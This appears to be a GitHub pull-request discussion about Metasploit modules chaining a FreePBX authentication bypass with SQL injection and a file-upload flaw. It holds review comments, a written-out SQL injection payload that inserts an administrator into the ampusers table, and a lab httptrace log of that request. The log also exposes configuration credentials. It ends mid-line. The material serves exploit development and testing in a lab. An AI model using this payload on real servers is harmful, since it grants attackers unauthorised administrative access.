Adds auxiliary module for FreePBX (CVE-2025-66039, CVE-2025-61675)

[msutovsky-r7]

This PR adds modules for multiple CVEs (CVE-2025-61675, CVE-2025-61678, CVE-2025-66039). This PR works as placeholder for now as modules are not finished, but contain the basic exploitation logic. All modules use authentication bypass (CVE-2025-66039). The CVE-2025-61675 describes multiple SQL injections, but the SQLi modules uses only one variant (one for user insertion, the other one for RCE).

WORK IN PROGRESS, TREAT AS SUCH

The CVE-2025-66039 represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user.

The CVE-2025-61675 describes multiple SQL injections; the modules exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration.

The CVE-2025-61678 allows unrestricted file uploads via firmware upload, including path traversal. These vulnerabilities allow unauthenticated remote code execution by bypassing authentication and placing a webshell in the web server’s directory.

To setup the environment, perform minimal installation from here. Note that Authorization Type needs to be set to webserver:

1. Login into FreePBX Administration
2. Settings -> Advanced Settings
3. Change Authorization Type to webserver

• Split modules into separate PRs

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[Chocapikk]

Suggested change

	'Name' => 'FreePB endpoint SQLi to RCE',
	'Name' => 'FreePBX endpoint SQLi to RCE',

[Chocapikk]

Suggested change

	'Name' => 'FreePBX firmeware file upload',
	'Name' => 'FreePBX firmware file upload',

[jvoisin]

Suggested change

FreePBX versions prior to 16.0.44 and 17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration.

FreePBX versions prior to 16.0.44 and 17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new administrative user.

[jvoisin]

Suggested change

	OptString.new('USERNAME', [true, 'The valid FreePBX user', 'admin']),
	OptString.new('USERNAME', [true, 'A valid FreePBX user', 'admin']),

[jvoisin]

Suggested change

	new fake user and effectively grants an attacker access to the administration.
	new administrative user.

[jvoisin]

Suggested change

This username is used in the Authorization header along with a random password.

This line is confusing and necessary in my opinion.

[jvoisin]

A quick git grep shows that NEW_USER or/and NEW_USERNAME are the prefered nomenclature.

There is nothing "fake" about the new user.

[jvoisin]

What if there is already a cronjob with the random name?

[jvoisin]

What's the point/advantage of this module compared to the cron-based one? Couldn't' the two be merged?

[jvoisin]

Suggested change

	OptString.new('USERNAME', [true, 'The valid FreePBX user', 'admin']),
	OptString.new('USERNAME', [true, 'A valid FreePBX user', 'admin']),

[jvoisin]

Can the values be randomized a bit?

[jvoisin]

Is FreePBX always installed in /var/www/?

[bwatters-r7]

A bit confused for the setup. I downloaded and installed the iso, and it was a linux distro. I created a root password and logged in to a text-based shell environment.
When you say

perform minimal installation from here.

That's just an iso file that appears to be a linux distro? There are no instructions, but I installed the OS as a vm and it provides a text shell.

Login into FreePBX Administration

Do you mean the resulting Linux distro's OS text shell? I don't see anything the appears to be a web interface?
The only ports I see open are 22, 53, 11, and 3306, so I'm not sure where this option lives?

[msutovsky-r7]

A bit confused for the setup. I downloaded and installed the iso, and it was a linux distro. I created a root password and logged in to a text-based shell environment.

When you say

perform minimal installation from here.

That's just an iso file that appears to be a linux distro? There are no instructions, but I installed the OS as a vm and it provides a text shell.

Login into FreePBX Administration

Do you mean the resulting Linux distro's OS text shell? I don't see anything the appears to be a web interface?

The only ports I see open are 22, 53, 11, and 3306, so I'm not sure where this option lives?

Huh,weird..The Administration should be web interface on port 80. Let me double check if the ISO works as expected.

[msutovsky-r7]

Right, I took a peek at the testing setup, you should see administration setup at http://[IP]/admin/config.php - there, you can configure your admin username/password and move on with the rest of configuration. Let me know how it goes. Sorry for confusion!

[bwatters-r7]

Dang; I was lazy and only looked at the IPv4 listening ports.......

Anyway, I can access the web server:

Thanks!

[adfoster-r7]

Do we need to pop on the disclosure date here?

[adfoster-r7]

Would this benefit from a check method? Or is it not possible to finger print/identify the vulnerability ahead of time without side effects 👀

[adfoster-r7]

(maybe)

Suggested change

	'Authorization' => basic_auth(datastore['USERNAME'], Rex::Text.rand_text_alphanumeric(6))
	'Authorization' => basic_auth(username, Rex::Text.rand_text_alphanumeric(6))

[adfoster-r7]

Suggested change

	def custom_extension_injection(username, password)
	def custom_extension_injection(username, password_digest)

[adfoster-r7]

Suggested change

	'id' => %<1';INSERT INTO ampusers (username, password_sha1, sections) VALUES ('#{username}', '#{password}', '*')#>
	'id' => %<1';INSERT INTO ampusers (username, password_sha1, sections) VALUES ('#{username}', '#{password_digest}', '*')#>

[bwatters-r7]

Suggested change

	1. Do: `run`
	1. Do: `set NEW_USERNAME [new username]`
	1. Do: `set NEW_PASSWORD [new password]`

[bwatters-r7]

Ugh...... highlighted the wrong line..... FAKE_USENAME => NEW_USERNAME

[bwatters-r7]

I'm getting a 401 when performing the database insert?

httptrace

msf auxiliary(gather/freepbx_custom_extension_injection) > show options

Module options (auxiliary/gather/freepbx_custom_extension_injection):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   NEW_PASSWORD  testing1234      no        Password for inserted user
   NEW_USERNAME  msfuser5         no        Username for inserted user
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4
                                            , socks5, socks5h, http, sapni
   RHOSTS        10.5.132.167     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME      msfuser          yes       A valid FreePBX user
   VHOST                          no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf auxiliary(gather/freepbx_custom_extension_injection) > set httptrace true
httptrace => true
msf auxiliary(gather/freepbx_custom_extension_injection) > run
[*] Running module against 10.5.132.167
[*] Trying to create new administrative user
####################
# Request:
####################
POST /admin/config.php?display=endpoint&view=customExt HTTP/1.1
Host: 10.5.132.167
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Authorization: Basic bXNmdXNlcjpveVFmazM=
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

id=1%27%3bINSERT%20INTO%20ampusers%20%28username%2c%20password_sha1%2c%20sections%29%20VALUES%20%28%27msfuser5%27%2c%20%27af542336022d81f0510c37920fd4461c6f754554%27%2c%20%27%2a%27%29%23
####################
# Response:
####################
HTTP/1.0 401 Unauthorized
Date: Thu, 15 Jan 2026 14:55:59 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16
X-Powered-By: PHP/7.4.16
Last-Modified: Thu, 15 Jan 2026 14:55:59 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: PHPSESSID=t16hbvbkliv1bltocd9q9vo06f; expires=Sat, 14-Feb-2026 14:55:59 GMT; Max-Age=2592000; path=/, lang=en_US
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html class="firsttypeofselector"><head><title>FreePBX Administration</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta name="robots" content="noindex" /><link rel="shortcut icon" href="images/favicon.ico"><meta name="referrer" content="always"><link href="assets/css/bootstrap-3.3.7.min.css?load_version=16.0.33" rel="stylesheet" type="text/css"><link href="assets/css/font-awesome.min-4.7.0.css?load_version=16.0.33" rel="stylesheet" type="text/css"><link href="assets/css/bootstrap-table-dev.css?load_version=16.0.33" rel="stylesheet" type="text/css"><link href="assets/css/bootstrap-table-reorder-rows.css?load_version=16.0.33" rel="stylesheet" type="text/css"><link href="assets/css/jquery-ui-1.10.3.custom.css?load_version=16.0.33" rel="stylesheet" type="text/css"><link href="assets/css/typehead.js-bootstrap3-0.2.3.css?load_version=16.0.33" rel="stylesheet" type="text/css"><link href="assets/css/notie.css?load_version=16.0.33" rel="stylesheet" type="text/css"><link href="assets/css/text-editor-1.2.1.css?load_version=16.0.33" rel="stylesheet" type="text/css"><link href="assets/less/cache/lessphp_95595f15d8343b3cc8c57434c67fcc8cf1ae2b86.css" rel="stylesheet" type="text/css"><link rel="stylesheet" href="assets/css/outdatedbrowser.min.css?load_version=16.0.33"><script type="text/javascript" src="assets/js/outdatedbrowser-1.1.3.min.js?load_version=16.0.33"></script><script type="text/javascript" src="assets/js/jquery-3.1.1.min.js?load_version=16.0.33"></script><script type="text/javascript" src="assets/js/selector-set-1.1.0.js?load_version=16.0.33"></script><script type="text/javascript" src="assets/js/jquery.selector-set-0.2.2.js?load_version=16.0.33"></script><script type="text/javascript" src="assets/js/class.js?load_version=16.0.33"></script><script type="text/javascript" src="assets/js/jed-1.1.1.js?load_version=16.0.33"></script><script type="text/javascript" src="assets/js/modgettext.js?load_version=16.0.33"></script><script>textdomain("endpoint")</script><script type="text/javascript" src="assets/js/FreePBX.js?load_version=16.0.33"></script><meta name="viewport" content="width=device-width,user-scalable=no,initial-scale=1,maximum-scale=1">
<meta name="apple-mobile-web-app-capable" content="yes" />
<link rel="apple-touch-icon" href="assets/images/badge.png" />
<link rel="apple-touch-icon-precomposed" href="assets/images/badge.png" /></head><body><div id="page"><noscript><div class="attention">WARNING: Javascript is disabled in your browser. The FreePBX administration interface requires Javascript to run properly. Please enable javascript or switch to another  browser that supports it.</div></noscript><link href="assets/endpoint/css/jquery.timepicker.css" rel="stylesheet" type="text/css" /><link href="assets/endpoint/css/main.css" rel="stylesheet" type="text/css" /><link href="assets/endpoint/less/cache/lessphp_df880a61e3631a38934918d96941866bd49f4121.css" rel="stylesheet" type="text/css" /><div class="freepbx-navbar">
	<nav class="navbar navbar-default navbar-fixed-top" role="navigation">
		<div class="container-fluid">
			<div class="navbar-header">
				<button type="button" class="navbar-toggle navbar-left collapsed" data-toggle="collapse" data-target="#fpbx-menu-collapse">
					<span class="sr-only">Toggle navigation</span>
					<span class="icon-bar"></span>
					<span class="icon-bar"></span>
					<span class="icon-bar"></span>
				</button>
				<a class="navbar-brand" href="#">
					<img src="images/tango.png" alt="FreePBX" title="FreePBX" id="MENU_BRAND_IMAGE_TANGO_LEFT" data-BRAND_IMAGE_FREEPBX_LINK_LEFT="http://www.freepbx.org" />
				</a>
			</div>
			<div class="collapse navbar-collapse" id="fpbx-menu-collapse">
				<ul class="nav navbar-nav navbar-left">
					<li class="dropdown">
			<a href="#" class="dropdown-toggle" data-toggle="dropdown">Admin</a>
			<ul class="dropdown-menu" role="menu"><li><a href="config.php?display=ampusers" class=" ">Administrators</a></li><li><a href="config.php?display=adv_recovery" class=" ">Advanced Recovery</a></li><li><a href="config.php?display=allowlist" class=" ">Allowlist</a></li><li><a href="config.php?display=cli" class=" ">Asterisk CLI</a></li><li><a href="config.php?display=astmodules" class=" ">Asterisk Modules</a></li><li><a href="config.php?display=phonebook" class=" ">Asterisk Phonebook</a></li><li><a href="config.php?display=backup" class=" ">Backup & Restore</a></li><li><a href="config.php?display=blacklist" class=" ">Blacklist</a></li><li><a href="config.php?display=bulkhandler" class=" ">Bulk Handler</a></li><li><a href="config.php?display=superfecta" class=" ">CID Superfecta</a></li><li><a href="config.php?display=callaccounting" class=" ">Call Accounting </a></li><li><a href="config.php?display=cidlookup" class=" ">CallerID Lookup Sources</a></li><li><a href="config.php?display=certman" class=" ">Certificate Management</a></li><li><a href="config.php?display=cos" class=" ">Class of Service</a></li><li><a href="config.php?display=configedit" class=" ">Config Edit</a></li><li><a href="config.php?display=contactmanager" class=" ">Contact Manager</a></li><li><a href="config.php?display=customdests" class=" ">Custom Destinations</a></li><li><a href="config.php?display=customextens" class=" ">Custom Extensions</a></li><li><a href="config.php?display=featurecodeadmin" class=" ">Feature Codes</a></li><li><a href="http://www.freepbx.org/support-and-professional-services" target="_blank"  class=" ">FreePBX Support</a></li><li><a href="config.php?display=modules" class=" ">Module Admin</a></li><li><a href="config.php?display=irc" class=" ">Online Support</a></li><li><a href="config.php?display=pbxmfa" class=" ">PBX MFA</a></li><li><a href="config.php?display=restapps" class=" ">Phone Apps</a></li><li><a href="config.php?display=presencestate" class=" ">Presence State</a></li><li><a href="config.php?display=queuepausecodes" class=" ">Queue Pause Codes</a></li><li><a href="config.php?display=qrules" class=" ">Queue Penalty Rules</a></li><li><a href="config.php?display=sangomaconnect" class=" ">SangomaConnect</a></li><li><a href="config.php?display=smartoffice" class=" ">SmartOffice</a></li><li><a href="config.php?display=soundlang" class=" ">Sound Languages</a></li><li><a href="config.php?display=sysadmin" class=" ">System Admin</a></li><li><a href="config.php?display=recordings" class=" ">System Recordings</a></li><li><a href="config.php?display=updates" class=" ">Updates</a></li><li><a href="config.php?display=userman" class=" ">User Management</a></li><li><a href="config.php?display=xmpp" class=" ">XMPP</a></li><li><a href="config.php?display=zulu" class=" ">Zulu</a></li><li><a href="config.php?display=cxpanel" class=" ">iSymphonyV3</a></li></ul><li class="dropdown">
			<a href="#" class="dropdown-toggle" data-toggle="dropdown">Applications</a>
			<ul class="dropdown-menu" role="menu"><li><a href="config.php?display=amd" class=" ">AMD Settings</a></li><li><a href="config.php?display=announcement" class=" ">Announcements</a></li><li><a href="config.php?display=areminder" class=" ">Appointment Reminder</a></li><li><a href="config.php?display=broadcast" class=" ">Broadcast</a></li><li><a href="config.php?display=calendar" class=" ">Calendar</a></li><li><a href="config.php?display=calendargroups" class=" ">Calendar Event Groups</a></li><li><a href="config.php?display=daynight" class=" ">Call Flow Control</a></li><li><a href="config.php?display=callrecording" class=" ">Call Recording</a></li><li><a href="config.php?display=callback" class=" ">Callback</a></li><li><a href="config.php?display=callerid" class=" ">CallerID Management</a></li><li><a href="config.php?display=conferences" class=" ">Conferences</a></li><li><a href="config.php?display=conferencespro" class=" ">Conferences Pro</a></li><li><a href="config.php?display=disa" class=" ">DISA</a></li><li><a href="config.php?display=directory" class=" ">Directory</a></li><li><a href="config.php?display=dynroute" class=" ">Dynamic Routes</a></li><li><a href="config.php?display=extensions" class=" ">Extensions</a></li><li><a href="config.php?display=findmefollow" class=" ">Follow Me</a></li><li><a href="config.php?display=ivr" class=" ">IVR</a></li><li><a href="config.php?display=languages" class=" ">Languages</a></li><li><a href="config.php?display=miscapps" class=" ">Misc Applications</a></li><li><a href="config.php?display=miscdests" class=" ">Misc Destinations</a></li><li><a href="config.php?display=missedcall" class=" ">Missed Call Notification</a></li><li><a href="config.php?display=paging" class=" ">Paging and Intercom</a></li><li><a href="config.php?display=pannounce" class=" ">Park and Announce</a></li><li><a href="config.php?display=parking" class=" ">Parking</a></li><li><a href="config.php?display=pms" class=" ">Property Management</a></li><li><a href="config.php?display=queuecallback" class=" ">Queue Callback</a></li><li><a href="config.php?display=queueprio" class=" ">Queue Priorities</a></li><li><a href="config.php?display=queues" class=" ">Queues</a></li><li><a href="config.php?display=ringgroups" class=" ">Ring Groups</a></li><li><a href="config.php?display=setcid" class=" ">Set CallerID</a></li><li><a href="config.php?display=tts" class=" ">Text To Speech</a></li><li><a href="config.php?display=timeconditions" class=" ">Time Conditions</a></li><li><a href="config.php?display=timegroups" class=" ">Time Groups</a></li><li><a href="config.php?display=vqueue" class=" ">Virtual Queues</a></li><li><a href="config.php?display=vmblast" class=" ">Voicemail Blasting</a></li><li><a href="config.php?display=vmnotify" class=" ">Voicemail Notifications</a></li><li><a href="config.php?display=hotelwakeup" class=" ">Wake Up Calls</a></li><li><a href="config.php?display=webcallback" class=" ">Web Callback</a></li></ul><li class="dropdown">
			<a href="#" class="dropdown-toggle" data-toggle="dropdown">Connectivity</a>
			<ul class="dropdown-menu" role="menu"><li><a href="config.php?display=api" class=" ">API</a></li><li><a href="config.php?display=dahdichandids" class=" ">DAHDI Channel DIDs</a></li><li><a href="config.php?display=dahdi" class=" ">DAHDi Config</a></li><li><a href="config.php?display=firewall" class=" ">Firewall</a></li><li><a href="config.php?display=did" class=" ">Inbound Routes</a></li><li><a href="config.php?display=voipinnovations" class=" ">Metered SIP Trunking</a></li><li><a href="config.php?display=calllimit" class=" ">Outbound Call Limit</a></li><li><a href="config.php?display=routing" class=" ">Outbound Routes</a></li><li><a href="config.php?display=sipstation" class=" ">SIPSTATION</a></li><li><a href="config.php?display=sms" class=" ">SMS Webhook</a></li><li><a href="config.php?display=trunks" class=" ">Trunks</a></li></ul><li><a href="config.php?display=index" >Dashboard</a></li><li class="dropdown">
			<a href="#" class="dropdown-toggle" data-toggle="dropdown">Reports</a>
			<ul class="dropdown-menu" role="menu"><li><a href="config.php?display=asteriskinfo" class=" ">Asterisk Info</a></li><li><a href="config.php?display=logfiles" class=" ">Asterisk Logfiles</a></li><li><a href="config.php?display=cdr" class=" ">CDR Reports</a></li><li><a href="config.php?display=cel" class=" ">Call Event Logging</a></li><li><a href="config.php?display=recording_report" class=" ">Call Recordings</a></li><li><a href="config.php?display=phpinfo" class=" ">PHP Info</a></li><li><a href="config.php?display=pinset_report" class=" ">Pinsets Code Reports</a></li><li><a href="config.php?display=printextensions" class=" ">Print Extensions</a></li><li><a href="config.php?display=queuecallbackreport" class=" ">Queue Callback Report</a></li><li><a href="config.php?display=qxact_scheduler" class=" ">Queue Report Scheduler </a></li><li><a href="config.php?display=qxact_admin" class=" ">Queue Report Templates</a></li><li><a href="config.php?display=qxact_reports" class=" ">Queue Reports</a></li><li><a href="config.php?display=queuestats" class=" ">Queue Wallboard</a></li><li><a href="config.php?display=sms_reports" class=" ">Sms Reports</a></li><li><a href="config.php?display=voicemail_report" class=" ">Voicemail Reports</a></li><li><a href="config.php?display=weakpasswords" class=" ">Weak Password Detection</a></li><li><a href="config.php?display=cxpanel_menu" target="_blank"  class=" ">iSymphonyV3 Panel</a></li></ul><li class="dropdown">
			<a href="#" class="dropdown-toggle" data-toggle="dropdown">Settings</a>
			<ul class="dropdown-menu" role="menu"><li><a href="config.php?display=advancedsettings" class=" ">Advanced Settings</a></li><li><a href="config.php?display=iaxsettings" class=" ">Asterisk IAX Settings</a></li><li><a href="config.php?display=logfiles_settings" class=" ">Asterisk Logfile Settings</a></li><li><a href="config.php?display=manager" class=" ">Asterisk Manager Users</a></li><li><a href="config.php?display=arimanager" class=" ">Asterisk REST Interface Users</a></li><li><a href="config.php?display=sipsettings" class=" ">Asterisk SIP Settings</a></li><li><a href="config.php?display=sangomacrmrest" class=" ">CRM API Settings</a></li><li><a href="config.php?display=sangomacrm" class=" ">CRM Settings</a></li><li><a href="config.php?display=endpoint" class=" active">EndPoint Manager</a></li><li><a href="config.php?display=extensionsettings" class=" ">Extension Settings</a></li><li><a href="config.php?display=fax" class=" ">Fax Configuration</a></li><li><a href="config.php?display=filestore" class=" ">Filestore</a></li><li><a href="config.php?display=music" class=" ">Music on Hold</a></li><li><a href="config.php?display=pinsets" class=" ">PIN Sets</a></li><li><a href="config.php?display=outroutemsg" class=" ">Route Congestion Messages</a></li><li><a href="config.php?display=ttsengines" class=" ">Text To Speech Engines</a></li><li><a href="config.php?display=voicemail" class=" ">Voicemail Admin</a></li><li><a href="config.php?display=hotelwakeup_settings" class=" ">Wake Up Calls Settings</a></li></ul><li><a href="/ucp"  target="ucp">UCP</a></li></ul>
			</div>
			<ul class="stuck-right">
									<li><a id="button_reload" class="btn btn-danger nav-button reload-btn">Apply Config</a></li>
																	<li class="dropdown admin-btn">
							<button class="btn dropdown-toggle nav-button" data-toggle="dropdown"><i class="fa fa-language"></i></button>
							<ul id="fpbx_lang" class="dropdown-menu" role="menu">
																	<li class="disabled" data-lang="en_US"><a href="#">English (US)</a></li>
																	<li  data-lang="bg_BG"><a href="#">Bulgarian (Bulgaria)</a></li>
																	<li  data-lang="cs"><a href="#">Czech</a></li>
																	<li  data-lang="de_DE"><a href="#">German (Germany)</a></li>
																	<li  data-lang="en_GB"><a href="#">English (United Kingdom)</a></li>
																	<li  data-lang="es_ES"><a href="#">Spanish (Spain)</a></li>
																	<li  data-lang="fa_IR"><a href="#">Persian (Iran)</a></li>
																	<li  data-lang="fr_FR"><a href="#">French (France)</a></li>
																	<li  data-lang="he_IL"><a href="#">Hebrew (Israel)</a></li>
																	<li  data-lang="hu_HU"><a href="#">Hungarian (Hungary)</a></li>
																	<li  data-lang="it_IT"><a href="#">Italian (Italy)</a></li>
																	<li  data-lang="ja_JP"><a href="#">Japanese (Japan)</a></li>
																	<li  data-lang="nl_NL"><a href="#">Dutch (Netherlands)</a></li>
																	<li  data-lang="pt_BR"><a href="#">Portuguese (Brazil)</a></li>
																	<li  data-lang="pt_PT"><a href="#">Portuguese (Portugal)</a></li>
																	<li  data-lang="ro_RO"><a href="#">Romanian (Romania)</a></li>
																	<li  data-lang="ru_RU"><a href="#">Russian (Russia)</a></li>
																	<li  data-lang="sv_SE"><a href="#">Swedish (Sweden)</a></li>
																	<li  data-lang="uk_UA"><a href="#">Ukrainian (Ukraine)</a></li>
																	<li  data-lang="vi"><a href="#">Vietnamese</a></li>
																	<li  data-lang="zh_CN"><a href="#">Chinese (China)</a></li>
															</ul>
						</li>
										<button id="search-btn" class="btn nav-button"><i class="fa fa-search"></i></button>
											<li class="dropdown admin-btn">
							<button class="btn dropdown-toggle nav-button" data-toggle="dropdown"><i id="settings-cog" class="fa fa-cog"></i></button>
							<ul class="dropdown-menu" role="menu">
								<li role="presentation" ><a>Hello, msfuser</a></li>
								<li role="presentation" class="divider"></li>
								<li role="presentation" class="nav-bar-show"><a title="Nav. Bar is always shown by default or not.">Keep Nav Bar Expanded</a></li>
								<li><a id="user_logout" href="#">Logout</a></li>
							</ul>
						</li>
												</ul>
		</div>
	</nav>
</div>
	<div class="in" id='fpbxsearch'>
		<i class="fa fa-search"></i>
		<input type="text" class="form-control typeahead" placeholder="Search" title="Quick Search '/'">
	</div>
<div id="page_body">
<br />
			<div style="margin-left:auto; margin-right:auto;text-align:center">This feature is currently not licensed. For more information on this feature or to purchase this Add-On, please see the information below.</div><div class="buy" style="margin-left:auto; margin-right:auto;text-align:center;margin-top:10px;"><button class="fpbx-buy btn" data-rawname="endpoint" style="font-size:24px !important;"><i class="fa fa-money"></i> Buy Now 
			  </button></div><div style="margin: 0 auto; width:100%; height:800px; padding-bottom:10px;">
			<iframe type="text/html" src="//www.freepbx.org/add-ons/#endpoint?vendor=freepbxdistro&module=endpoint" style="width:100%; height:100%; margin:1%;"></iframe>
		</div><script>
var timezone = 'UTC';
var language = 'en_US';
var UIDEFAULTLANG = 'en_US';
var PHPTIMEZONE = 'UTC';
var datetimeformat = 'llll';
var dateformat = 'l';
var timeformat = 'LT';
</script>
</div></div><div id="footer"><hr /><div id="action-bar"><div id="action-buttons"><button id="action-bar-hide" class="btn"><i class="fa fa-angle-double-right"></i></button><input  name="submit" type="submit" value="Save Custom Extension" id="submit" ><input  name="delete" type="submit" value="Remove Custom Extension" id="delete" ></div></div><div id="footer_content" class="row"><div class="col-md-4">
	<a target="_blank" href="http://www.freepbx.org" ><img id="footer_logo1" src="/admin/images/freepbx_small.png?load_version=16.0.33" alt="FreePBX&reg;"/>
	</a>
	</div><div class="col-md-4" id="footer_text"><a href="http://www.freepbx.org" target="_blank">FreePBX</a> is a registered trademark of<br /><a href="http://www.freepbx.org/copyright.html" target="_blank"> Sangoma Technologies Inc.</a><br />FreePBX 16.0.33 is licensed under the <a href="http://www.gnu.org/copyleft/gpl.html" target="_blank"> GPL</a><br /><a href="http://www.freepbx.org/copyright.html" target="_blank">Copyright&copy; 2007-2026</a></div><div class="col-md-4">
	<a target="_blank" href="http://www.sangoma.com" ><img id="footer_logo" src="/admin/images/sangoma-horizontal_thumb.png" alt="www.sangoma.com"/>
	</a>
	</div></div></div>
<script type="text/javascript">var fpbx={"conf":{"AS_DISPLAY_FRIENDLY_NAME":1,"AS_DISPLAY_HIDDEN_SETTINGS":0,"AS_DISPLAY_READONLY_SETTINGS":0,"AS_OVERRIDE_READONLY":0,"HTTPENABLESTATIC":0,"HTTPENABLED":1,"HTTPTLSENABLE":1,"HTTPWEBSOCKETMODE":"pjsip","HTTPBINDADDRESS":"::","HTTPBINDPORT":8088,"HTTPPREFIX":"","HTTPTLSBINDADDRESS":"::","HTTPTLSBINDPORT":8089,"TLSDISABLEV1":1,"TLSDISABLEV11":0,"TLSDISABLEV12":0,"HTTPTLSCERTFILE":"\/etc\/asterisk\/keys\/integration\/certificate.pem","HTTPTLSPRIVATEKEY":"\/etc\/asterisk\/keys\/integration\/webserver.key","HTTPSESSIONINACTIVITY":30000,"HTTPSESSIONKEEPALIVE":15000,"HTTPSESSIONLIMIT":100,"ASTMGRWRITETIMEOUT":5000,"ENABLE_ARI":0,"FPBX_ARI_USER":"p65ndithPgjA","ARI_ALLOWED_ORIGINS":"localhost:8088","FPBX_ARI_PASSWORD":"274927dbfa11e008dcc0785ee2a5cab0","ENABLE_ARI_PP":0,"ARI_WS_WRITE_TIMEOUT":100,"CA_CALL_DECK_PRIORITY":"Trunks","DAYNIGHTTCHOOK":0,"CALLREC_BEEP_PERIOD":"","CALL_REC_OPTION":1,"CEL_ENABLED":1,"CELDBNAME":"","CELDBTABLENAME":"","CERT_DAYS_VAL":"730","FORCEALLOWCONFRECORDING":0,"ENABLE_FAVORITE_CONTACTS":0,"CONTACTMANLOOKUPLENGTH":7,"JOBSRANDOMSLEEP":0,"FWJOBS_LOGS":0,"DAHDISHOWDIGITALCHANS":0,"DAHDIEXEC":"\/etc\/init.d\/dahdi","DAHDIMODULESLOC":"\/etc\/dahdi\/modules","DAHDIDISABLEWRITE":1,"DAHDIMODPROBELOC":"\/etc\/modprobe.d\/dahdi.conf","DAHDIECHOCAN":"oslec","DAHDISYSTEMLOC":"\/etc\/dahdi\/system.conf","DAHDIMOCKHW":0,"SYS_STATS_DISABLE":0,"VIEW_FW_STATUS":1,"SYS_STATS_MAXAGE":50,"FORCE_JS_CSS_IMG_DOWNLOAD":0,"AMPLOCALBIN":"","FPBXDBUGFILE":"\/var\/log\/asterisk\/freepbx_dbug","DEVEL":0,"FPBXDBUGDISABLE":1,"DISABLE_CSS_AUTOGEN":0,"MODULEADMIN_SKIP_CACHE":0,"DISPLAY_MONITOR_TRUNK_FAILURES_FIELD":0,"JQMIGRATE":1,"ENABLE_MIRROR_LOG":0,"FPBXPERFLOGGING":0,"DEVELRELOAD":0,"MIXMON_POST":"","POST_RELOAD_DEBUG":0,"POST_RELOAD":"","PRE_RELOAD":"","DIE_FREEPBX_VERBOSE":0,"USE_PACKAGED_JS":1,"DEVICE_STRONG_SECRETS":1,"DEVICE_REMOVE_MAILBOX":0,"DEVICE_SIP_CANREINVITE":"no","DEVICE_SIP_DTMF":"rfc2833","DEVICE_SIP_TRUSTRPID":"yes","DEVICE_SIP_SENDRPID":"pai","DEVICE_SIP_NAT":"yes","DEVICE_SIP_ENCRYPTION":"no","DEVICE_SIP_QUALIFYFREQ":60,"DEVICE_QUALIFY":"yes","DEVICE_ALLOW":"","DEVICE_DISALLOW":"","DEVICE_CALLGROUP":"","DEVICE_PICKUPGROUP":"","DIAL_OPTIONS":"HhTtr","TRUNK_OPTIONS":"T","TRANSFER_CONTEXT":"from-internal-xfer","ATTTRANSALERTINFO":"inherit","BLINDTRANSALERTINFO":"inherit","BLOCK_OUTBOUND_TRUNK_CNAM":0,"CFRINGTIMERDEFAULT":"0","REC_POLICY":"caller","CLEARGLOBALVARS":0,"ASTCONFAPP":"app_confbridge","ZAP2DAHDICOMPAT":1,"TONEZONE":"us","ENABLECW":1,"DISABLECUSTOMCONTEXTS":0,"INBOUND_NOTRANS":1,"OUTBOUND_CID_UPDATE":1,"OUTBOUND_DIAL_UPDATE":1,"CONNECTEDLINE_PRESENCESTATE":1,"DITECH_VQA_INBOUND":"7","DITECH_VQA_OUTBOUND":"7","DYNAMICHINTS":0,"RFC7462":1,"CONCURRENCYLIMITDEFAULT":"3","FCBEEPONLY":0,"FORCE_INTERNAL_AUTO_ANSWER_ALL":0,"DIVERSIONHEADER":0,"INTERNALALERTINFO":"inherit","DEFAULT_INTERNAL_AUTO_ANSWER":"disabled","LAUNCH_AGI_AS_FASTAGI":1,"NOOPTRACE":"0","CWINUSEBUSY":1,"CID_PREPEND_REPLACE":1,"ASTSTOPPOLLINT":"2","RINGTIMER":"15","ASTSIPDRIVER":"chan_pjsip","TIMEFORMAT":"12 Hour 